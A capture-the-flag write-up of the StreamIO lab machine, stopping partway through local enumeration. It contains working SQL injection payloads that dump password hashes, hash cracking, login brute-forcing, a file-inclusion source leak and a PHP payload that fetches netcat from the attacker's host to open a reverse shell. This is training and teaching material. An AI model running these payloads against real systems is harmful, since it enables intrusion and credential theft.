StreamIO

Completed on Sept 22, 2022

Overview

When I decided to work on this machine, I was looking for more options to practice for the OSCP. This machine was to me like hitting the jackpot as you can practice webapp attacks, lateral movement, Active Directory, and most importantly to do a thorough enumeration. With this you can take the fact that it shows you how you can move inwards from a web application to become a Domain Admin in Active Directory.

References

Enumeration

Finding Open Ports

Just like we normally do, we need to enumerate the available services to then continue our enumeration process.

┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ sudo nmap -Pn -sS -p- --min-rate=1000 --min-parallelism=100 -T5 10.129.167.113 -oA StreamIO
[sudo] password for kali: 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-12 23:21 EDT
Nmap scan report for 10.129.167.113
Host is up (0.16s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
443/tcp   open  https
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49677/tcp open  unknown
49678/tcp open  unknown
49708/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 131.36 seconds
                                                                                                                    
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ PORTS=$(cat StreamIO.nmap | grep open | awk -F "\/.*" '{print $1}' | sort -u | xargs | tr ' ' ',') 
awk: warning: escape sequence `\/' treated as plain `/'
                                                                                                                    
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ sudo nmap -Pn -sS -sC -sV -p $PORTS --min-rate=1000 --min-parallelism=100 -T5 10.129.167.113 -oA StreamIO-PortScan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-12 23:23 EDT
Nmap scan report for 10.129.167.113
Host is up (0.15s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-09-13 10:24:02Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
443/tcp   open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| tls-alpn: 
|_  http/1.1
|_http-title: Not Found
| ssl-cert: Subject: commonName=streamIO/countryName=EU
| Subject Alternative Name: DNS:streamIO.htb, DNS:watch.streamIO.htb
| Not valid before: 2022-02-22T07:03:28
|_Not valid after:  2022-03-24T07:03:28
|_ssl-date: 2022-09-13T10:25:34+00:00; +7h00m00s from scanner time.
|_http-server-header: Microsoft-HTTPAPI/2.0
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49678/tcp open  msrpc         Microsoft Windows RPC
49708/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2022-09-13T10:24:55
|_  start_date: N/A
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 6h59m59s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.85 seconds
[1]    206000 segmentation fault  sudo nmap -Pn -sS -sC -sV -p $PORTS --min-rate=1000 --min-parallelism=100 -T5

From the service enumeration, we get the following hosts which will be added to our hosts file:

streamIO.htb
watch.streamIO.htb

LDAP Enumeration

Moving forward with the service enumeration, we would like to see what's available to us through LDAP, but chances are you need to authenticate first.

┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ ldapsearch -x -H ldap://streamio.htb:389 -D '' -w '' -b 'DC=streamio,DC=htb' 
# extended LDIF
#
# LDAPv3
# base <DC=streamio,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v4563

# numResponses:

Not much without credentials, but we can still get some basic information without credentials:

┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ ldapsearch -x -H ldap://streamio.htb:389 -x -s base -b '' "(objectClass=*)" "*" +
# extended LDIF
#
# LDAPv3
# base <> with scope baseObject
# filter: (objectClass=*)
# requesting: * + 
#

#
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=streamIO,DC=htb
ldapServiceName: streamIO.htb:dc$@STREAMIO.HTB
isGlobalCatalogReady: TRUE
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 3
supportedLDAPVersion: 2
supportedLDAPPolicies: MaxPoolThreads
supportedLDAPPolicies: MaxPercentDirSyncRequests
supportedLDAPPolicies: MaxDatagramRecv
supportedLDAPPolicies: MaxReceiveBuffer
supportedLDAPPolicies: InitRecvTimeout
supportedLDAPPolicies: MaxConnections
supportedLDAPPolicies: MaxConnIdleTime
supportedLDAPPolicies: MaxPageSize
supportedLDAPPolicies: MaxBatchReturnMessages
supportedLDAPPolicies: MaxQueryDuration
supportedLDAPPolicies: MaxDirSyncDuration
supportedLDAPPolicies: MaxTempTableSize
supportedLDAPPolicies: MaxResultSetSize
supportedLDAPPolicies: MinResultSets
supportedLDAPPolicies: MaxResultSetsPerConn
supportedLDAPPolicies: MaxNotificationPerConn
supportedLDAPPolicies: MaxValRange
supportedLDAPPolicies: MaxValRangeTransitive
supportedLDAPPolicies: ThreadMemoryLimit
supportedLDAPPolicies: SystemMemoryLimitPercent
supportedControl: 1.2.840.113556.1.4.319
supportedControl: 1.2.840.113556.1.4.801
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 1.2.840.113556.1.4.528
supportedControl: 1.2.840.113556.1.4.417
supportedControl: 1.2.840.113556.1.4.619
supportedControl: 1.2.840.113556.1.4.841
supportedControl: 1.2.840.113556.1.4.529
supportedControl: 1.2.840.113556.1.4.805
supportedControl: 1.2.840.113556.1.4.521
supportedControl: 1.2.840.113556.1.4.970
supportedControl: 1.2.840.113556.1.4.1338
supportedControl: 1.2.840.113556.1.4.474
supportedControl: 1.2.840.113556.1.4.1339
supportedControl: 1.2.840.113556.1.4.1340
supportedControl: 1.2.840.113556.1.4.1413
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.10
supportedControl: 1.2.840.113556.1.4.1504
supportedControl: 1.2.840.113556.1.4.1852
supportedControl: 1.2.840.113556.1.4.802
supportedControl: 1.2.840.113556.1.4.1907
supportedControl: 1.2.840.113556.1.4.1948
supportedControl: 1.2.840.113556.1.4.1974
supportedControl: 1.2.840.113556.1.4.1341
supportedControl: 1.2.840.113556.1.4.2026
supportedControl: 1.2.840.113556.1.4.2064
supportedControl: 1.2.840.113556.1.4.2065
supportedControl: 1.2.840.113556.1.4.2066
supportedControl: 1.2.840.113556.1.4.2090
supportedControl: 1.2.840.113556.1.4.2205
supportedControl: 1.2.840.113556.1.4.2204
supportedControl: 1.2.840.113556.1.4.2206
supportedControl: 1.2.840.113556.1.4.2211
supportedControl: 1.2.840.113556.1.4.2239
supportedControl: 1.2.840.113556.1.4.2255
supportedControl: 1.2.840.113556.1.4.2256
supportedControl: 1.2.840.113556.1.4.2309
supportedControl: 1.2.840.113556.1.4.2330
supportedControl: 1.2.840.113556.1.4.2354
supportedCapabilities: 1.2.840.113556.1.4.800
supportedCapabilities: 1.2.840.113556.1.4.1670
supportedCapabilities: 1.2.840.113556.1.4.1791
supportedCapabilities: 1.2.840.113556.1.4.1935
supportedCapabilities: 1.2.840.113556.1.4.2080
supportedCapabilities: 1.2.840.113556.1.4.2237
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=streamIO,DC=htb
serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configurat
 ion,DC=streamIO,DC=htb
schemaNamingContext: CN=Schema,CN=Configuration,DC=streamIO,DC=htb
namingContexts: DC=streamIO,DC=htb
namingContexts: CN=Configuration,DC=streamIO,DC=htb
namingContexts: CN=Schema,CN=Configuration,DC=streamIO,DC=htb
namingContexts: DC=DomainDnsZones,DC=streamIO,DC=htb
namingContexts: DC=ForestDnsZones,DC=streamIO,DC=htb
isSynchronized: TRUE
highestCommittedUSN: 147565
dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN
 =Sites,CN=Configuration,DC=streamIO,DC=htb
dnsHostName: DC.streamIO.htb
defaultNamingContext: DC=streamIO,DC=htb
currentTime: 20220913103319.0Z
configurationNamingContext: CN=Configuration,DC=streamIO,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

HTTP(S) Enumeration

This part of the enumeration is self-explanatory. We basically need to know what the applications are about and then try to find our way in.

While enumerating we find an email address with a domain we also got to see in our nmap scan and then while enumerating LDAP:

We also have Barry and Samantha as potential users of the environment as they are employees of StreamIO:

While enumerating pages and directories, we found a login pages on /login.php:

Which also leads to a /register.php page which we used to create one but when testing, it did not work. So we need to enumerate the applications' pages and directories from both URLs to get to know more of them.

stream.io:

┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ gobuster dir -u 'https://streamio.htb/' -k -w /opt/seclists/Discovery/Web-Content/big.txt -r -b 404 -t 20 --timeout 60s --wildcard -x .php,.log,.html 2> /dev/null
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://streamio.htb/
[+] Method:                  GET
[+] Threads:                 20
[+] Wordlist:                /opt/seclists/Discovery/Web-Content/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php,log,html
[+] Follow Redirect:         true
[+] Timeout:                 1m0s
===============================================================
2022/09/13 16:11:55 Starting gobuster in directory enumeration mode
===============================================================
/Admin                (Status: 403) [Size: 18]
/ADMIN                (Status: 403) [Size: 18]
/About.php            (Status: 200) [Size: 7825]
/Contact.php          (Status: 200) [Size: 6434]
/Images               (Status: 403) [Size: 1233]
/Index.php            (Status: 200) [Size: 13497]
/Login.php            (Status: 200) [Size: 4145] 
/about.php            (Status: 200) [Size: 7825] 
/admin                (Status: 403) [Size: 18]   
/contact.php          (Status: 200) [Size: 6434] 
/css                  (Status: 403) [Size: 1233] 
/favicon.ico          (Status: 200) [Size: 1150] 
/fonts                (Status: 403) [Size: 1233] 
/images               (Status: 403) [Size: 1233] 
/index.php            (Status: 200) [Size: 13497]
/js                   (Status: 403) [Size: 1233] 
/login.php            (Status: 200) [Size: 4145] 
/logout.php           (Status: 200) [Size: 13497]
/register.php         (Status: 200) [Size: 4500] 
===============================================================
2022/09/13 16:24:37 Finished
===============================================================

watch.streamio.htb:

┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ gobuster dir -u 'https://watch.streamio.htb/' -k -w /opt/seclists/Discovery/Web-Content/big.txt -r -b 404 -t 20 --timeout 60s --wildcard -x .php,.log,.html 2> /dev/null
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://watch.streamio.htb/
[+] Method:                  GET
[+] Threads:                 20
[+] Wordlist:                /opt/seclists/Discovery/Web-Content/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php,log,html
[+] Follow Redirect:         true
[+] Timeout:                 1m0s
===============================================================
2022/09/13 16:12:16 Starting gobuster in directory enumeration mode
===============================================================
/Index.php            (Status: 200) [Size: 2829]
/Search.php           (Status: 200) [Size: 253887]
/blocked.php          (Status: 200) [Size: 677]   
/favicon.ico          (Status: 200) [Size: 1150]  
/index.php            (Status: 200) [Size: 2829]  
/search.php           (Status: 200) [Size: 253887]
/static               (Status: 403) [Size: 1233]  
===============================================================
2022/09/13 16:24:50 Finished
===============================================================

These pages don't lead to much, and we do have an admin directory, so let's fuzz it and see what's inside if anything:

┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ wfuzz -c -z file,/opt/seclists/Discovery/Web-Content/big.txt -u "https://streamio.htb/admin/FUZZ.php" --hc 404 --hl 0
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: https://streamio.htb/admin/FUZZ.php
Total requests: 20476

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                            
=====================================================================

000011469:   200        1 L      6 W        58 Ch       "master"                                           

Total time: 317.6052
Processed Requests: 20476
Filtered Requests: 20475
Requests/sec.: 64.46996

When accessing this page:

We will get to see later this is sort of a clue of what we will have to do or use.

SQL Injection:

Given what we have, we tried to do some injection on https://streamio.htb/login.php. It is a Time-based SQLi that takes hours to run. Some data was retrieved but not completely. One thing to point out is that through our enumeration for SQLi, we determined this machine is using SQL Server which is important to know.

Through https://watch.streamio.htb/search.php

Performing a basic test using: summer' OR 1=1--

Union-based SQLi Test: summer' UNION SELECT 1--

Even though it did not throw an error and was not redirected, we retrieved no data. It is possible this is a true positive Union-based SQLi.

Attempting to get the number of columns in the table:

From the multiple tests we performed, we were able to determine the table has 6 columns and we can retrieve data through the second one which is possibly a VARCHAR type column.

Query: summer' UNION SELECT 1,(SELECT @@version),1,1,1,1--

Retrieving the system user the database is running as:

Query: summer' UNION SELECT 1,(SELECT system_user),1,1,1,1--

Retrieving list of databases:

Query: summer' UNION SELECT 1,(SELECT db_name(N)),1,1,1,1--

┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ for num in {1..10}; do \    
curl -sLkX POST --url "https://watch.streamio.htb/search.php" --data-urlencode "q=summer' UNION SELECT 1,(SELECT db_name(${num})),1,1,1,1--" | grep -m 1 -oP '<h5 class="p-2">(.*)</h5>'; \
done | sed 's/<.*>\(.*\)<\/.*>/\1/'                 
master
tempdb
model
msdb
STREAMIO
streamio_backup

Retrieving list of tables in STREAMIO database: using STRING_AGG to retrieve the list as a one liner:

┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ curl -sLkX POST --url "https://watch.streamio.htb/search.php" --data-urlencode "q=summer' UNION SELECT 1,(SELECT STRING_AGG(name,',') FROM STREAMIO..sysobjects WHERE xtype = 'U'),1,1,1,1--" | grep -m 1 -oP '<h5 class="p-2">(.*)</h5>' | sed 's/<.*>\(.*\)<\/.*>/\1/'          
movies,users

Retrieving list of columns in STREAMIO..users table: using STRING_AGG to retrieve the list as a one liner from the table in the current database (STREAMIO)

┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ curl -sLkX POST --url "https://watch.streamio.htb/search.php" --data-urlencode "q=summer' UNION SELECT 1,(SELECT STRING_AGG(name,',') FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'users')),1,1,1,1--" | grep -m 1 -oP '<h5 class="p-2">(.*)</h5>' | sed 's/<.*>\(.*\)<\/.*>/\1/'
id,is_staff,password,username

Retrieving username,password,is_staff content from STREAMIO..users table: using STRING_AGG and CONCAT to retrieve the list as a one liner

┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ curl -sLkX POST --url "https://watch.streamio.htb/search.php" --data-urlencode "q=summer' UNION SELECT 1,(SELECT STRING_AGG(CONCAT(username,':',password,'/',is_staff),',') FROM STREAMIO..users),1,1,1,1--" | grep -m 1 -oP '<h5 class="p-2">(.*)</h5>' | sed 's/<.*>\(.*\)<\/.*>/\1/' | tr -d ' ' | sed 's/,/\n/g'
James:c660060492d9edcaa8332d89c99c9239/1
Theodore:925e5408ecb67aea449373d668b7359e/1
Samantha:083ffae904143c4796e464dac33c1f7d/1
Lauren:08344b85b329d7efd611b7a7743e8a09/1
William:d62be0dc82071bccc1322d64ec5b6c51/1
Sabrina:f87d3c0d6c8fd686aacc6627f1f493a5/1
Robert:f03b910e2bd0313a23fdd7575f34a694/1
Thane:3577c47eb1e12c8ba021611e1280753c/1
Carmon:35394484d89fcfdb3c5e447fe749d213/1
Barry:54c88b2dbd7b1a84012fabc1a4c73415/1
Oliver:fd78db29173a5cf701bd69027cb9bf6b/1
Michelle:b83439b16f844bd6ffe35c02fe21b3c0/1
Gloria:0cfaaaafb559f081df2befbe66686de0/1
Victoria:b22abb47a02b52d5dfa27fb0b534f693/1
Alexendra:1c2b3d8270321140e5153f6637d3ee53/1
Baxter:22ee218331afd081b0dcd8115284bae3/1
Clara:ef8f3d30a856cf166fb8215aca93e9ff/1
Barbra:3961548825e3e21df5646cafe11c6c76/1
Lenord:ee0b8a0937abd60c2882eacb2f8dc49f/1
Austin:0049ac57646627b8d7aeaccf8b6a936f/1
Garfield:8097cedd612cc37c29db152b6e9edbd3/1
Juliette:6dcd87740abb64edfa36d170f0d5450d/1
Victor:bf55e15b119860a6e6b5a164377da719/1
Lucifer:7df45a9e3de3863807c026ba48e55fb3/1
Bruno:2a4e2cf22dd8fcb45adcb91be1e22ae8/1
Diablo:ec33265e5fc8c2f1b0c137bb7b3632b5/1
Robin:dc332fb5576e9631c9dae83f194f8e70/1
Stan:384463526d288edcc95fc3701e523bc7/1
yoshihide:b779ba15cedfd22a023c4d8bcf5f2332/1
admin:665a50ac9eaa781e4f7f04199db97a11/0

Cracking MD5 hashes in database:

Here, we try to crack the MD5 hashes we found in the database using JohnTheRipper:

┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ john --format=Raw-MD5 --wordlist=/opt/seclists/Passwords/Leaked-Databases/rockyou.txt db_users1
Using default input encoding: UTF-8
Loaded 30 password hashes with no different salts (Raw-MD5 [MD5 128/128 AVX 4x3])
Remaining 28 password hashes with no different salts
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
physics69i       (Lenord)     
paddpadd         (admin)     
66boysandgirls.. (yoshihide)     
%$clara          (Clara)     
$monique$1991$   (Bruno)     
$hadoW           (Barry)     
$3xybitch        (Juliette)     
##123a8j8w5123## (Lauren)     
!?Love?!123      (Michelle)     
!5psycho8!       (Victoria)     
10g 0:00:00:01 DONE (2022-09-21 00:47) 7.352g/s 10546Kp/s 10546Kc/s 279422KC/s  filimani..*7¡Vamos!
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.

Some passwords were missed so we had to use crackstation.

┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ pr -m -t users passwd 
Lauren				    ##123a8j8w5123##
Sabrina				    !!sabrina$
Thane				    highschoolmusical
Barry				    $hadoW
Michelle			    !?Love?!123
Victoria			    !5psycho8!
Clara				    %$clara
Lenord				    physics69i
Juliette			    $3xybitch
Bruno				    $monique$1991$
yoshihide			    66boysandgirls..
admin				    paddpadd

Since we have a login page and database credentials, we need to know which one we can use, so we will test with Hydra:

┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ hydra -L users -P passwd streamio.htb https-post-form "/login.php:username=^USER^&password=^PASS^:F=Login failed"
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-09-21 01:42:11
[DATA] max 16 tasks per 1 server, overall 16 tasks, 144 login tries (l:12/p:12), ~9 tries per task
[DATA] attacking http-post-forms://streamio.htb:443/login.php:username=^USER^&password=^PASS^:F=Login failed
[443][http-post-form] host: streamio.htb   login: yoshihide   password: 66boysandgirls..
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-09-21 01:42:30

Testing login with yoshihide redirects to /login.php and then you need to browse to /admin manually which will reuse the session cookie:

The /admin page:

From these links, we only see the following, but we can also attempt to fuzz it and see what else:

Using WFuzz:

┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ wfuzz -c -z file,/opt/seclists/Discovery/Web-Content/big.txt -u "https://streamio.htb/admin/?FUZZ=" --hc 301,403,404 --hw 131 -b 'PHPSESSID=qrdq5raiimuql0o5jglipafr20'
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: https://streamio.htb/admin/?FUZZ=
Total requests: 20476

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                            
=====================================================================

000005860:   200        49 L     137 W      1712 Ch     "debug"                                            
000012080:   200        10790    25878 W    320235 Ch   "movie"                                            
                        L                                                                                  
000017116:   200        398 L    916 W      12484 Ch    "staff"                                            
000018838:   200        62 L     160 W      2073 Ch     "user"                                             

Total time: 249.3074
Processed Requests: 20476
Filtered Requests: 20472
Requests/sec.: 82.13150

This did not find ‘message’ which we know exist, but we found ‘debug’:

Local File Inclusion:

Through this parameter, we can attempt to access files through Local File Inclusion if vulnerable:

┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ wfuzz -c -z file,/opt/seclists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt -u "https://streamio.htb/admin/?debug=FUZZ" --hc 301,403,404 --hw 137 -b 'PHPSESSID=qrdq5raiimuql0o5jglipafr20'
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: https://streamio.htb/admin/?debug=FUZZ
Total requests: 235

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                            
=====================================================================

000000044:   200        56 L     148 W      1804 Ch     "C:/Windows/win.ini"                               
000000043:   200        70 L     273 W      2577 Ch     "C:/WINDOWS/System32/drivers/etc/hosts"            
000000065:   200        718 L    2664 W     46280 Ch    "C:/Windows/System32/inetsrv/config/schema/ASPNET_s
                                                        chema.xml"                                         
000000221:   200        76 L     307 W      3070 Ch     "c:/WINDOWS/system32/drivers/etc/protocol"         
000000232:   200        53 L     168 W      1988 Ch     "c:/WINDOWS/WindowsUpdate.log"                     
000000220:   200        65 L     190 W      2119 Ch     "c:/WINDOWS/system32/drivers/etc/networks"         
000000222:   200        336 L    1383 W     19347 Ch    "c:/WINDOWS/system32/drivers/etc/services"         
000000218:   200        70 L     273 W      2577 Ch     "c:/WINDOWS/system32/drivers/etc/hosts"            
000000219:   200        128 L    720 W      5395 Ch     "c:/WINDOWS/system32/drivers/etc/lmhosts.sam"      

Total time: 3.482762
Processed Requests: 235
Filtered Requests: 226
Requests/sec.: 67.47517

Using the first as an example shows this parameter can be used for Local File Inclusion

Let's attempt to find php or other files in the current directory of the application:

┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ wfuzz -c -z file,/opt/seclists/Discovery/Web-Content/dirsearch.txt -u "https://streamio.htb/admin/?debug=FUZZ" --hc 301,403,404 --hw 137 -b 'PHPSESSID=qrdq5raiimuql0o5jglipafr20' 
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: https://streamio.htb/admin/?debug=FUZZ
Total requests: 12938

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                            
=====================================================================

000007006:   200        46 L     136 W      1693 Ch     "index.php"                                        

Total time: 163.6831
Processed Requests: 12938
Filtered Requests: 12937
Requests/sec.: 79.04295

It returns an error message most probably as the webserver is not able to interpret the file or is restricted. We can encode this and try to retrieve the content:

Using -> php://filter/convert.base64-decode/resource=

┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ curl -sLkX GET --url 'https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=index.php' --cookie 'PHPSESSID=qrdq5raiimuql0o5jglipafr20' | grep -E 'this option is for developers only(.*)' | sed 's/\t\t\(.*\)<\/.*>/\1/' | sed 's/\tthis option is for developers only//g' | base64 -d
<?php
define('included',true);
session_start();
if(!isset($_SESSION['admin']))
{
	header('HTTP/1.1 403 Forbidden');
	die("<h1>FORBIDDEN</h1>");
}
$connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" => 'B1@hx31234567890');
$handle = sqlsrv_connect('(local)',$connection);

?>
<!DOCTYPE html>
<html>
<head>
...
</head>
<body>
...
</body>
</html>base64: invalid input

Even though we truncated the output, in line 11 you can see the database connection string with hardcoded credentials: db_admin:B1@hx31234567890

Retrieving the contents of /admin/master.php accessed previously:

┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ curl -sLkX GET --url 'https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=master.php' --cookie 'PHPSESSID=qrdq5raiimuql0o5jglipafr20' | grep -E 'this option is for developers only(.*)' | sed 's/\t\t\(.*\)<\/.*>/\1/' | sed 's/\tthis option is for developers only//g' | base64 -d
<h1>Movie managment</h1>
<?php
...
?>

<div>
	<div class="form-control" style="height: 3rem;">
		<h4 style="float:left;"><?php echo $row['movie']; ?></h4>
		<div style="float:right;padding-right: 25px;">
			<form method="POST" action="?movie=">
				<input type="hidden" name="movie_id" value="<?php echo $row['id']; ?>">
				<input type="submit" class="btn btn-sm btn-primary" value="Delete">
			</form>
		</div>
	</div>
</div>
<?php
} # while end
?>
<br><hr><br>
<h1>Staff managment</h1>
<?php
...
} # while end
?>
<br><hr><br>
<form method="POST">
<input name="include" hidden>
</form>
<?php
if(isset($_POST['include']))
{
if($_POST['include'] !== "index.php" ) 
eval(file_get_contents($_POST['include']));
else
echo(" ---- ERROR ---- ");
}
?>base64: invalid input

This basically tell us at the end that through the ‘includes’ POST parameter, we can potentially use it for RFI and execute commands against the system.

Gaining Access

Remote File Inclusion

This user was found in the database but the same credentials don't allow access to the system, but we can use RFI to get a reverse shell.

shell.php:

$cmd = "curl http://10.10.14.72/nc.exe -o C:\\Windows\\Temp\\nc.exe";
system($cmd);      
                   
$cmd = "C:\\Windows\\Temp\\nc.exe 10.10.14.72 1337 -e cmd.exe";                                                     
system($cmd);

Execution:

┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ curl -sLkX POST --url 'https://streamio.htb/admin/?debug=master.php' --data 'include=http://10.10.14.72/shell.php' --cookie 'PHPSESSID=qrdq5raiimuql0o5jglipafr20'

Reverse Shell:

┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ nc -lvp 1337
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 10.129.204.168.
Ncat: Connection from 10.129.204.168:49213.
Microsoft Windows [Version 10.0.17763.2928]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\inetpub\streamio.htb\admin>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is A381-2B63

 Directory of C:\inetpub\streamio.htb\admin

02/22/2022  03:49 AM    <DIR>          .
02/22/2022  03:49 AM    <DIR>          ..
02/22/2022  03:49 AM    <DIR>          css
02/22/2022  03:49 AM    <DIR>          fonts
02/22/2022  03:49 AM    <DIR>          images
06/03/2022  01:51 AM             2,401 index.php
02/22/2022  04:19 AM    <DIR>          js
06/03/2022  01:53 AM             3,055 master.php
02/23/2022  03:16 AM               878 movie_inc.php
02/23/2022  03:16 AM               936 staff_inc.php
02/23/2022  03:16 AM               879 user_inc.php
               5 File(s)          8,149 bytes
               6 Dir(s)   7,064,821,760 bytes free

C:\inetpub\streamio.htb\admin>whoami
whoami
streamio\yoshihide

Local Enumeration

Attempting to use the db_admin credentials found after we upgrade to Powershell:

┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ nc -lvp 1338
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::1338
Ncat: Listening on 0.0.0.0:1338
Ncat: Connection from 10.129.56.7.
Ncat: Connection from 10.129.56.7:62458.
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\inetpub\streamio.htb\admin> sqlcmd -S '(local)' -U db_admin -P 'B1@hx31234567890' -Q "SELECT name from streamio_backup..sysobjects WHERE xtype = 'U';"
sqlcmd -S '(local)' -U db_admin -P 'B1@hx31234567890' -Q "SELECT name from streamio_backup..sysobjects WHERE xtype = 'U';"
name                                                                                                                            
--------------------------------------------------------------------------------------------------------------------------------
movies                                                                                                                          
users                                                                                                                           

(2 rows affected)

PS C:\inetpub\streamio.htb\admin> sqlcmd -S '(local)' -U db_admin -P 'B1@hx31234567890' -Q "SELECT username,password FROM streamio_backup..users;"   
